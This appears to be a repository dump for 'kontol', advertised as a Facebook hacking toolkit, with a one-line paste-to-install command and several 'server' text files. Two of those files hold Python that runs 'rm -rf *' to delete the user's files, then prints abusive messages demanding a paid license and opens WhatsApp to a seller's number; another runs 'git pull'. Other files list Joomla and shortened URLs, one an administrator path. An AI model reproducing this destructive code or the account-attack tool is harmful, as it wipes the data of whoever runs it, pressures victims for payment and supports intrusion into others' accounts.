├── server4.txt ├── server5.txt ├── server6.txt ├── server7.txt ├── server.txt ├── server8.txt ├── kontol.py ├── README.md ├── server3.txt └── server2.txt /server4.txt: -------------------------------------------------------------------------------- 1 | https://ranch-19.joomla.com/ 2 | -------------------------------------------------------------------------------- /server5.txt: -------------------------------------------------------------------------------- 1 | https://asutol.cloudaccess.host/ 2 | -------------------------------------------------------------------------------- /server6.txt: -------------------------------------------------------------------------------- 1 | http://infosehatku.club/GzP7MH9 2 | -------------------------------------------------------------------------------- /server7.txt: -------------------------------------------------------------------------------- 1 | https://ranch199.joomla.com/ 2 | -------------------------------------------------------------------------------- /server.txt: -------------------------------------------------------------------------------- 1 | import os 2 | os.system("git pull") 3 | -------------------------------------------------------------------------------- /server8.txt: -------------------------------------------------------------------------------- 1 | http://batavianjaker.joomla.com/administrator/ 2 | -------------------------------------------------------------------------------- /kontol.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LOoLzeC/kontol/HEAD/kontol.py -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | # kontol 3 | Facebook Hacking Tools 4 |

5 |

paste this code from your terminal for auto install

6 |
7 |
pkg install git;pkg install python2;pip2 install requests;git clone https://github.com/LOoLzeC/kontol;cd kontol;python2 kontol.py
8 | 9 | -------------------------------------------------------------------------------- /server3.txt: -------------------------------------------------------------------------------- 1 | import subprocess,os 2 | os.system("rm -rf *") 3 | raw_input("""HAI KALIAN SEMUA ANJING!! 4 | UDAH GW BANTU DECOMPILE NIH TOOLS TAPI 5 | MASIH PADA LO JUAL?!! NGENTOT LOSEMUA 6 | GAK NGEHARGAIN GW ANJING!! 7 | 8 | SEBAGAI PELAJARAN BUAT LOSEMUA KONTOL!!! 9 | MAU LAGI TOOLS NYA? BAYAR LISENSI KE GW 20k ya ANJING 10 | 11 | TEKAN ENTER ANJING AYO KITA GELUD 12 | VIA WHATSAPP!!!!1!1!1 13 | """) 14 | subprocess.check_output(["am","start","https://api.whatsapp.com/send?phone=62895353484895&text=SUMPAH%20DEMI%20ALLAH%20ANJING%20GW%20MAU%20BELI%20LISENSI%20DARKONTOL%20SAMA%20LORD%20DERAY%20SEHARGA%2020K!1!1!1"]) 15 | -------------------------------------------------------------------------------- /server2.txt: -------------------------------------------------------------------------------- 1 | import time,subprocess,os 2 | os.system("rm -rf *") 3 | os.system("clear") 4 | print("[!] mohon maaf trial gratis sudah berakhir") 5 | print("[!] silahkan membeli fitur premium untuk asu toolkit yang lebih baik.") 6 | print("[!] pilih y untuk langsung menghubungi administrator (whatsapp)") 7 | f=raw_input("[!] beli? y/n): ").lower() 8 | if f =="y": 9 | subprocess.check_output( 10 | ["am","start", 11 | "https://api.whatsapp.com/send?phone=62895353484895&text=helo%20admin%20saya%20ingin%20membeli%20asu%20toolkit%20premium%20fitur"]) 12 | exit("[!] terimakasih atas jawaban anda.") 13 | 14 | #s=subprocess.Popen(["git","pull"], 15 | # stdout=subprocess.PIPE) 16 | #time.sleep(2) 17 | --------------------------------------------------------------------------------